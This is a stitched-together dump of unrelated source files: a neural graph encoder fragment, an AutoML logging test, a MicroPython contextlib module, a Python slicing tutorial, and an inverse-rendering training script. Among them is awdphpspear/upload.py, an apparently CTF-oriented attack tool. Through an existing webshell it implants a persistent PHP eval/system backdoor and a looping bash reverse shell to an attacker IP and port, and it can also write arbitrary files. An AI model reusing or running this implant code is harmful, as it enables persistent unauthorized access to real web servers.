x=pre_process_layer(out=attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
return post_process_layer(prev_out=attn_output, # add dropout and residual connection
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn')
def graph_encoder(enc_words_output,
src_words_slf_attn_bias,
src_sents_slf_attn_bias,
graph_attn_bias,
cls_ids,
pos_win,
graph_layers,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='graph_encoder'):
"""
:param enc_words_output: # (batch_size, n_tokens, emb_dim)
:param src_words_slf_attn_bias: (batch_size, n_head, n_tokens, n_tokens)
:param src_sents_slf_attn_bias: (batch_size, n_head, n_block, n_block)
:param graph_attn_bias: (batch_size, n_head, n_block, n_block)
:param cls_ids: (batch_size, n_block, 2)
:return:
"""
sents_vec = layers.gather_nd(enc_words_output, cls_ids)
enc_input = sents_vec # (batch_size, n_block, d_model)
for i in range(graph_layers):
# (batch_size, n_block, emb_dim)
enc_output = graph_encoder_layer(
enc_input=enc_input, # (batch_size, n_block, emb_dim)
attn_bias=src_sents_slf_attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
enc_input = enc_output # (batch_size, n_block, emb_dim)
# add layer normalization
enc_output = pre_process_layer(out=enc_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return enc_output # (batch_size, n_block, emb_dim)
def pretrained_graph_encoder(sents_vec,
src_sents_slf_attn_bias,
graph_attn_bias,
pos_win,
graph_layers,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='pretrained_graph_encoder'):
"""
:param sents_vec: # (batch_size, n_blocks, emb_dim)
:param src_sents_slf_attn_bias: (batch_size, n_head, n_block, n_block)
:param graph_attn_bias: (batch_size, n_head, n_block, n_block)
:return:
"""
enc_input = sents_vec # (batch_size, n_block, d_model)
for i in range(graph_layers):
# (batch_size, n_block, emb_dim)
enc_output = graph_encoder_layer(
enc_input=enc_input, # (batch_size, n_block, emb_dim)
attn_bias=src_sents_slf_attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
enc_input = enc_output # (batch_size, n_block, emb_dim)
# add layer normalization
enc_output = pre_process_layer(out=enc_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return enc_output # (batch_size, n_block, emb_dim)
|
test/test_training_log.py | nmonarizqa/FLAML | 1,747 | 12698092 | <filename>test/test_training_log.py
import os
import unittest
from tempfile import TemporaryDirectory
from sklearn.datasets import fetch_california_housing
from flaml import AutoML
from flaml.training_log import training_log_reader
class TestTrainingLog(unittest.TestCase):
def test_training_log(self, path="test_training_log.log", estimator_list="auto"):
with TemporaryDirectory() as d:
filename = os.path.join(d, path)
# Run a simple job.
automl = AutoML()
automl_settings = {
"time_budget": 1,
"metric": "mse",
"task": "regression",
"log_file_name": filename,
"log_training_metric": True,
"mem_thres": 1024 * 1024,
"n_jobs": 1,
"model_history": True,
"train_time_limit": 0.1,
"verbose": 3,
# "ensemble": True,
"keep_search_state": True,
"estimator_list": estimator_list,
}
X_train, y_train = fetch_california_housing(return_X_y=True)
automl.fit(X_train=X_train, y_train=y_train, **automl_settings)
# Check if the training log file is populated.
self.assertTrue(os.path.exists(filename))
if automl.best_estimator:
estimator, config = automl.best_estimator, automl.best_config
model0 = automl.best_model_for_estimator(estimator)
print(model0.params["n_estimators"], config)
# train on full data with no time limit
automl._state.time_budget = None
model, _ = automl._state._train_with_config(estimator, config)
# assuming estimator & config are saved and loaded as follows
automl = AutoML()
automl.fit(
X_train=X_train,
y_train=y_train,
max_iter=1,
task="regression",
estimator_list=[estimator],
n_jobs=1,
starting_points={estimator: config},
)
print(automl.best_config)
# then the fitted model should be equivalent to model
assert (
str(model.estimator) == str(automl.model.estimator)
or estimator == "xgboost"
and str(model.estimator.get_dump())
== str(automl.model.estimator.get_dump())
or estimator == "catboost"
and str(model.estimator.get_all_params())
== str(automl.model.estimator.get_all_params())
)
with training_log_reader(filename) as reader:
count = 0
for record in reader.records():
print(record)
count += 1
self.assertGreater(count, 0)
automl_settings["log_file_name"] = None
automl.fit(X_train=X_train, y_train=y_train, **automl_settings)
automl._selected.update(None, 0)
automl = AutoML()
automl.fit(X_train=X_train, y_train=y_train, max_iter=0, task="regression")
def test_illfilename(self):
try:
self.test_training_log("/")
except IsADirectoryError:
print("IsADirectoryError happens as expected in linux.")
except PermissionError:
print("PermissionError happens as expected in windows.")
def test_each_estimator(self):
self.test_training_log(estimator_list=["xgboost"])
self.test_training_log(estimator_list=["catboost"])
self.test_training_log(estimator_list=["extra_tree"])
self.test_training_log(estimator_list=["rf"])
self.test_training_log(estimator_list=["lgbm"])
|
awdphpspear/upload.py | hillmanyoung/AWD | 146 | 12698100 | <reponame>hillmanyoung/AWD
import requests
import os
def trojan_implant(address,webshell,trojan,password):
payload = ''
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
payload += "'"
payload += trojan
payload += "'"
payload += ';$code='
payload += "'"
payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
payload += "'"
payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
data = {password:<PASSWORD>}
try:
r = requests.get(address+webshell)
print address+webshell,"[+]Webshell Works Well."
except:
print address+webshell,"[-]Webshell Failed"
try:
r = requests.post(address+webshell,data=data,timeout=1)
if r.status_code == 200:
r = requests.get(address+trojan)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Trojan Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
except:
r = requests.get(address+trojan)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[-]Trojan Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
def trojan_implant_memory(address,webshell,trojan,ip,port,password):
payload = ''
payload += '$code = "<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
payload += ''
payload += "while(1){@system('bash -i >& /dev/tcp/"
payload += ip
payload += "/"
payload += str(port)
payload += ''' 0>&1');};";'''
payload += '$file = '
payload += '"'
payload += trojan
payload += '";'
payload += 'file_put_contents($file,$code);'
data = {password:<PASSWORD>}
try:
r = requests.get(address+webshell)
print address+webshell,"[+]Webshell Works Well."
except:
print address+webshell,"[-]Webshell Failed."
try:
r = requests.post(address+webshell,data=data,timeout=1)
if r.status_code == 200:
r = requests.get(address+trojan,timeout=1)
print "[+]Implant Succeed."
print "[+]Trojan Content:",r.text
except:
r = requests.get(address+trojan,timeout=1)
print "[+]Implant Succeed."
print 'nc -lvvp '+str(port)+' To Connect.'
def file_implant(address,webshell,name,data,password):
payload = ''
payload += '$file='
payload += "'"
payload += name
payload += "';"
payload += '$code='
payload += "'"
payload += data
payload += "';"
payload += 'file_put_contents($file,$code);'
file_data = {password:<PASSWORD>}
try:
r = requests.get(address+webshell)
print address,"[+]Webshell Works Well."
except:
print address,"[-]Webshell Failed"
try:
r = requests.post(address+webshell,data=file_data,timeout=1)
if r.status_code == 200:
r = requests.get(address+name)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Content:",r.text
print "*******************************************************"
except:
r = requests.get(address+name)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
def check(address):
try:
r =requests.get(address)
if r.status_code == 200 :
print address,"[+]Living."
print "*******************************************************"
return 1
else:
print address,"[-]Dead."
print "*******************************************************"
return 0
except:
print address,"Dead."
print "*******************************************************"
return 0 |
src/main/resources/assets/openpython/opos/v1.1/lib/micropython/contextlib.py | fossabot/OpenPython | 126 | 12698116 | """Utilities for with-statement contexts. See PEP 343.
Original source code: https://hg.python.org/cpython/file/3.4/Lib/contextlib.py
Not implemented:
- redirect_stdout;
"""
import sys
from collections import deque
from ucontextlib import *
class closing(object):
"""Context to automatically close something at the end of a block.
Code like this:
with closing(<module>.open(<arguments>)) as f:
<block>
is equivalent to this:
f = <module>.open(<arguments>)
try:
<block>
finally:
f.close()
"""
def __init__(self, thing):
self.thing = thing
def __enter__(self):
return self.thing
def __exit__(self, *exc_info):
self.thing.close()
class suppress:
"""Context manager to suppress specified exceptions
After the exception is suppressed, execution proceeds with the next
statement following the with statement.
with suppress(FileNotFoundError):
os.remove(somefile)
# Execution still resumes here if the file was already removed
"""
def __init__(self, *exceptions):
self._exceptions = exceptions
def __enter__(self):
pass
def __exit__(self, exctype, excinst, exctb):
# Unlike isinstance and issubclass, CPython exception handling
# currently only looks at the concrete type hierarchy (ignoring
# the instance and subclass checking hooks). While Guido considers
# that a bug rather than a feature, it's a fairly hard one to fix
# due to various internal implementation details. suppress provides
# the simpler issubclass based semantics, rather than trying to
# exactly reproduce the limitations of the CPython interpreter.
#
# See http://bugs.python.org/issue12029 for more details
return exctype is not None and issubclass(exctype, self._exceptions)
# Inspired by discussions on http://bugs.python.org/issue13585
class ExitStack(object):
"""Context manager for dynamic management of a stack of exit callbacks
For example:
with ExitStack() as stack:
files = [stack.enter_context(open(fname)) for fname in filenames]
# All opened files will automatically be closed at the end of
# the with statement, even if attempts to open files later
# in the list raise an exception
"""
def __init__(self):
self._exit_callbacks = deque()
def pop_all(self):
"""Preserve the context stack by transferring it to a new instance"""
new_stack = type(self)()
new_stack._exit_callbacks = self._exit_callbacks
self._exit_callbacks = deque()
return new_stack
def _push_cm_exit(self, cm, cm_exit):
"""Helper to correctly register callbacks to __exit__ methods"""
def _exit_wrapper(*exc_details):
return cm_exit(cm, *exc_details)
self.push(_exit_wrapper)
def push(self, exit):
"""Registers a callback with the standard __exit__ method signature
Can suppress exceptions the same way __exit__ methods can.
Also accepts any object with an __exit__ method (registering a call
to the method instead of the object itself)
"""
# We use an unbound method rather than a bound method to follow
# the standard lookup behaviour for special methods
_cb_type = type(exit)
try:
exit_method = _cb_type.__exit__
except AttributeError:
# Not a context manager, so assume its a callable
self._exit_callbacks.append(exit)
else:
self._push_cm_exit(exit, exit_method)
return exit # Allow use as a decorator
def callback(self, callback, *args, **kwds):
"""Registers an arbitrary callback and arguments.
Cannot suppress exceptions.
"""
def _exit_wrapper(exc_type, exc, tb):
callback(*args, **kwds)
self.push(_exit_wrapper)
return callback # Allow use as a decorator
def enter_context(self, cm):
"""Enters the supplied context manager
If successful, also pushes its __exit__ method as a callback and
returns the result of the __enter__ method.
"""
# We look up the special methods on the type to match the with statement
_cm_type = type(cm)
_exit = _cm_type.__exit__
result = _cm_type.__enter__(cm)
self._push_cm_exit(cm, _exit)
return result
def close(self):
"""Immediately unwind the context stack"""
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, *exc_details):
received_exc = exc_details[0] is not None
# Callbacks are invoked in LIFO order to match the behaviour of
# nested context managers
suppressed_exc = False
pending_raise = False
while self._exit_callbacks:
cb = self._exit_callbacks.pop()
try:
if cb(*exc_details):
suppressed_exc = True
pending_raise = False
exc_details = (None, None, None)
except:
exc_details = sys.exc_info()
pending_raise = True
if pending_raise:
raise exc_details[1]
return received_exc and suppressed_exc
|
第2章/program/String_List_Tuple.py | kingname/SourceCodeOfBook | 274 | 12698155 | example_string = '我是字符串'
example_list = ['我', '是', '列', '表']
example_tuple = ('我', '是', '元', '组')
print('1.取第一个元素 >', example_string[0], example_list[0], example_tuple[0])
print('2.取下标为2的元素(第三个元素)>', example_string[2], example_list[2], example_tuple[2])
print('3.取最后一个元素 >', example_string[-1], example_list[-1], example_tuple[-1])
print('4.取倒数第二个元素 >', example_string[-2], example_list[-2], example_tuple[-2])
print('5.切片0:1 >', example_string[0:1], example_list[0:1], example_tuple[0:1])
print('6.切片0:2 >', example_string[0:2], example_list[0:2], example_tuple[0:2])
print('7.切片2:4 >', example_string[2:4], example_list[2:4], example_tuple[2:4])
print('8.切片从第一个元素直到下标为1的元素 >', example_string[:2], example_list[:2], example_tuple[:2])
print('9.切片从下标为1的元素直到全部 >', example_string[1:], example_list[1:], example_tuple[1:])
print('10.切片去掉最后一个元素 >', example_string[:-1], example_list[:-1], example_tuple[:-1])
print('11.切片去掉最后两个元素 >', example_string[:-2], example_list[:-2], example_tuple[:-2])
print('12.每2个字取一个 >', example_string[::2], example_list[::2], example_tuple[::2])
print('13.将字符串、列表、元组倒序输出 >', example_string[::-1], example_list[::-1], example_tuple[::-1])
# string_1 = '你好'
# string_2 = '世界'
# string_3 = string_1 + string_2
# print(string_3)
#
#
# list_1 = ['abc', 'xyz']
# list_2 = ['哈哈哈哈', '嘿嘿嘿黑']
# list_3 = list_1 + list_2
# print(list_3)
#
# existed_list = [1, 2, 3]
# existed_list[1] = '新的值'
# print(existed_list)
#
# list_4 = ['Python', '爬虫']
# print(list_4)
# list_4.append('一')
# print(list_4)
# list_4.append('酷')
# print(list_4) |
trainFineTuneNYU.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 12698156 | import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import nyuDataLoader as dataLoader_nyu
import dataLoader as dataLoader_ours
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import wrapperBRDF as wcg
import wrapperNYU as wnyu
import scipy.io as io
import os.path as osp
parser = argparse.ArgumentParser()
# The locationi of training set
parser.add_argument('--dataRoot', default=None, help='path to input images')
parser.add_argument('--NYURoot', default=None, help='path to the NYU dataset')
parser.add_argument('--experimentBRDF', default=None, help='path to the model for BRDF prediction')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepochBRDF', type=int, default=14, help='the number of epochs for BRDF prediction')
parser.add_argument('--nepoch', type=int, default=2, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=8, help='input batch size')
parser.add_argument('--imHeight', type=int, default=240, help='the height / width of the input image to network')
parser.add_argument('--imWidth', type=int, default=320, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0, 1], help='the gpus used for training network')
# The training weight
parser.add_argument('--albedoWeight', type=float, default=0.75, help='the weight for the diffuse component')
parser.add_argument('--normalWeight', type=float, default=0.5, help='the weight for the diffuse component')
parser.add_argument('--roughWeight', type=float, default=0.25, help='the weight for the roughness component')
parser.add_argument('--depthWeight', type=float, default=0.25, help='the weight for depth component')
# The training weight on NYU
parser.add_argument('--normalNYUWeight', type=float, default=4.5, help='the weight for the diffuse component')
parser.add_argument('--depthNYUWeight', type=float, default=4.5, help='the weight for depth component')
# Cascae Level
parser.add_argument('--cascadeLevel', type=int, default=0, help='the casacade level')
# The detail network setting
opt = parser.parse_args()
print(opt)
opt.gpuId = opt.deviceIds[0]
torch.multiprocessing.set_sharing_strategy('file_system')
if opt.experiment is None:
opt.experiment = 'check_cascadeNYU%d' % opt.cascadeLevel
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
if opt.experimentBRDF is None:
opt.experimentBRDF = 'check_cascade0_w%d_h%d' % (opt.imWidth, opt.imHeight )
albeW, normW = opt.albedoWeight, opt.normalWeight
rougW = opt.roughWeight
deptW = opt.depthWeight
normNYUW = opt.normalNYUWeight
depthNYUW = opt.depthNYUWeight
opt.seed = 0
print("Random Seed: ", opt.seed )
random.seed(opt.seed )
torch.manual_seed(opt.seed )
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# Initial Network
encoder = models.encoder0(cascadeLevel = opt.cascadeLevel )
albedoDecoder = models.decoder0(mode=0 )
normalDecoder = models.decoder0(mode=1 )
roughDecoder = models.decoder0(mode=2 )
depthDecoder = models.decoder0(mode=4 )
####################################################################
#########################################
encoder.load_state_dict( torch.load('{0}/encoder{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
albedoDecoder.load_state_dict( torch.load('{0}/albedo{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
normalDecoder.load_state_dict( torch.load('{0}/normal{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
roughDecoder.load_state_dict( torch.load('{0}/rough{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
depthDecoder.load_state_dict( torch.load('{0}/depth{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
lr_scale = 0.5
#########################################
encoder = nn.DataParallel(encoder, device_ids = opt.deviceIds )
albedoDecoder = nn.DataParallel(albedoDecoder, device_ids = opt.deviceIds )
normalDecoder = nn.DataParallel(normalDecoder, device_ids = opt.deviceIds )
roughDecoder = nn.DataParallel(roughDecoder, device_ids = opt.deviceIds )
depthDecoder = nn.DataParallel(depthDecoder, device_ids = opt.deviceIds )
############## ######################
# Send things into GPU
if opt.cuda:
encoder = encoder.cuda(opt.gpuId )
albedoDecoder = albedoDecoder.cuda(opt.gpuId )
normalDecoder = normalDecoder.cuda(opt.gpuId )
roughDecoder = roughDecoder.cuda(opt.gpuId )
depthDecoder = depthDecoder.cuda(opt.gpuId )
####################################
####################################
# Optimizer
opEncoder = optim.Adam(encoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opAlbedo = optim.Adam(albedoDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opNormal = optim.Adam(normalDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opRough = optim.Adam(roughDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opDepth = optim.Adam(depthDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader_ours.BatchLoader( opt.dataRoot, imWidth = opt.imWidth, imHeight = opt.imHeight,
cascadeLevel = 0, isLight = False )
NYUDataset = dataLoader_nyu.NYULoader(
imRoot = osp.join(opt.NYURoot, 'images'),
normalRoot = osp.join(opt.NYURoot, 'normals'),
depthRoot = osp.join(opt.NYURoot, 'depths'),
segRoot = osp.join(opt.NYURoot, 'masks'),
imHeight = opt.imHeight,
imWidth = opt.imWidth,
phase = 'TRAIN' )
trainDataset = dataLoader_nyu.ConcatDataset(brdfDataset, NYUDataset)
brdfLoader = DataLoader(trainDataset, batch_size = opt.batchSize, num_workers =
6, shuffle = True)
j = 0
# BRDFLost
albedoErrsNpList = np.ones( [1, 1], dtype = np.float32 )
normalErrsNpList = np.ones( [1, 1], dtype = np.float32 )
roughErrsNpList= np.ones( [1, 1], dtype = np.float32 )
depthErrsNpList = np.ones( [1, 1], dtype = np.float32 )
normalNYUErrsNpList = np.ones([1, 1], dtype=np.float32 )
angleNYUErrsNpList = np.ones([1, 1], dtype = np.float32 )
depthNYUErrsNpList = np.ones([1, 1], dtype=np.float32 )
for epoch in list(range(0, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, trainBatch in enumerate(brdfLoader):
j += 1
dataBatch = trainBatch[0]
NYUBatch = trainBatch[1]
#####################################################################################################################
############################################# Train with CGBRDF dataset #############################################
#####################################################################################################################
# Clear the gradient in optimizer
opEncoder.zero_grad()
opAlbedo.zero_grad()
opNormal.zero_grad()
opRough.zero_grad()
opDepth.zero_grad()
albedoPair, normalPair, roughPair, depthPair \
= wcg.wrapperBRDF(dataBatch, opt, encoder,
albedoDecoder, normalDecoder, roughDecoder, depthDecoder )
albedoPred, albedoErr = albedoPair[0], albedoPair[1]
normalPred, normalErr = normalPair[0], normalPair[1]
roughPred, roughErr = roughPair[0], roughPair[1]
depthPred, depthErr = depthPair[0], depthPair[1]
# Back propagate the gradients
totalErr = 4 * albeW * albedoErr + normW * normalErr \
+ rougW *roughErr + deptW * depthErr
totalErr.backward()
# Update the network parameter
opEncoder.step()
opAlbedo.step()
opNormal.step()
opRough.step()
opDepth.step()
# Output training error
utils.writeErrToScreen('albedo', [albedoErr], epoch, j)
utils.writeErrToScreen('normal', [normalErr], epoch, j)
utils.writeErrToScreen('rough', [roughErr], epoch, j)
utils.writeErrToScreen('depth', [depthErr], epoch, j)
utils.writeErrToFile('albedo', [albedoErr], trainingLog, epoch, j)
utils.writeErrToFile('normal', [normalErr], trainingLog, epoch, j)
utils.writeErrToFile('rough', [roughErr], trainingLog, epoch, j)
utils.writeErrToFile('depth', [depthErr], trainingLog, epoch, j)
albedoErrsNpList = np.concatenate( [albedoErrsNpList, utils.turnErrorIntoNumpy( [albedoErr] )], axis=0)
normalErrsNpList = np.concatenate( [normalErrsNpList, utils.turnErrorIntoNumpy( [normalErr] )], axis=0)
roughErrsNpList = np.concatenate( [roughErrsNpList, utils.turnErrorIntoNumpy( [roughErr] )], axis=0)
depthErrsNpList = np.concatenate( [depthErrsNpList, utils.turnErrorIntoNumpy( [depthErr] )], axis=0)
if j < 1000:
utils.writeNpErrToScreen('albedoAccu', np.mean(albedoErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('normalAccu', np.mean(normalErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('roughAccu', np.mean(roughErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('depthAccu', np.mean(depthErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToFile('albedoAccu', np.mean(albedoErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('normalAccu', np.mean(normalErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('roughAccu', np.mean(roughErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccu', np.mean(depthErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('albedoAccu', np.mean(albedoErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('normalAccu', np.mean(normalErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('roughAccu', np.mean(roughErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccu', np.mean(depthErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('albedoAccu', np.mean(albedoErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('normalAccu', np.mean(normalErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('roughAccu', np.mean(roughErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccu', np.mean(depthErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j% 2000 == 0:
# Save the predicted results
vutils.save_image( ( (albedoPred ) ** (1.0/2.2) ).data,
'{0}/{1}_albedoPred_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(normalPred + 1) ).data,
'{0}/{1}_normalPred_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(roughPred + 1) ).data,
'{0}/{1}_roughPred_{2}.png'.format(opt.experiment, j, 0) )
depthOut = 1 / torch.clamp(depthPred + 1, 1e-6, 10)
vutils.save_image( ( depthOut ).data,
'{0}/{1}_depthPred_{2}.png'.format(opt.experiment, j, 0) )
##############################################################################################################
######################################## Train with NYU dataset ##############################################
##############################################################################################################
# Clear the gradient in optimizer
opEncoder.zero_grad()
opAlbedo.zero_grad()
opNormal.zero_grad()
opRough.zero_grad()
opDepth.zero_grad()
albedoPair, normalPair, roughPair, depthPair \
= wnyu.wrapperNYU(NYUBatch, opt, encoder,
albedoDecoder, normalDecoder, roughDecoder, depthDecoder )
albedoPred = albedoPair[0]
normalPred, normalErr, angleErr = normalPair[0], normalPair[1], normalPair[2]
roughPred = roughPair[0]
depthPred, depthErr = depthPair[0], depthPair[1]
totalErr = normNYUW * normalErr + depthNYUW * depthErr
totalErr.backward()
# Update the network parameter
opEncoder.step()
opAlbedo.step()
opNormal.step()
opRough.step()
opDepth.step()
# Output training error
utils.writeErrToScreen('normalNYU', [normalErr], epoch, j)
utils.writeErrToScreen('angleNYU', [angleErr], epoch, j)
utils.writeErrToScreen('depthNYU', [depthErr], epoch, j)
utils.writeErrToFile('normalNYU', [normalErr], trainingLog, epoch, j)
utils.writeErrToFile('angleNYU', [angleErr], trainingLog, epoch, j)
utils.writeErrToFile('depthNYU', [depthErr], trainingLog, epoch, j)
normalNYUErrsNpList = np.concatenate( [normalNYUErrsNpList, utils.turnErrorIntoNumpy( [normalErr] )], axis=0)
angleNYUErrsNpList = np.concatenate( [angleNYUErrsNpList, utils.turnErrorIntoNumpy( [angleErr] )], axis=0)
depthNYUErrsNpList = np.concatenate( [depthNYUErrsNpList, utils.turnErrorIntoNumpy( [depthErr] )], axis=0)
if j < 1000:
utils.writeNpErrToScreen('normalAccuNYU', np.mean(normalNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('angleAccuNYU', np.mean(angleNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccuNYU', np.mean(depthNYUErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('normalAccuNYU', np.mean(normalNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('angleAccuNYU', np.mean(angleNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccuNYU', np.mean(depthNYUErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('normalAccuNYU', np.mean(normalNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('angleAccuNYU', np.mean(angleNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('depthAccuNYU', np.mean(depthNYUErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('normalAccuNYU', np.mean(normalNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('angleAccuNYU', np.mean(angleNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccuNYU', np.mean(depthNYUErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j% 500 == 0:
# Save the predicted results
vutils.save_image( ( (albedoPred ) ** (1.0/2.2) ).data,
'{0}/{1}_albedoPredNYU_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(normalPred + 1) ).data,
'{0}/{1}_normalPredNYU_{2}.png'.format(opt.experiment, j, 0) )
vutils.save_image( ( 0.5*(roughPred + 1) ).data,
'{0}/{1}_roughPredNYU_{2}.png'.format(opt.experiment, j, 0) )
depthOut = 1 / torch.clamp(depthPred + 1, 1e-6, 10)
vutils.save_image( ( depthOut ).data,
'{0}/{1}_depthPredNYU_{2}.png'.format(opt.experiment, j, 0) )
if j % 2000 == 0:
# save the models
torch.save(encoder.module, '{0}/encoder{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(albedoDecoder.module, '{0}/albedo{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(normalDecoder.module, '{0}/normal{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(roughDecoder.module, '{0}/rough{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
torch.save(depthDecoder.module, '{0}/depth{1}_{2}_{3}.pth'.format(opt.experiment, opt.cascadeLevel, epoch, j) )
######################################################################################################################
trainingLog.close()
# Update the training rate
if (epoch + 1) % 10 == 0:
for param_group in opEncoder.param_groups:
param_group['lr'] /= 2
for param_group in opAlbedo.param_groups:
param_group['lr'] /= 2
for param_group in opNormal.param_groups:
param_group['lr'] /= 2
for param_group in opRough.param_groups:
param_group['lr'] /= 2
for param_group in opDepth.param_groups:
param_group['lr'] /= 2
# Save the error record
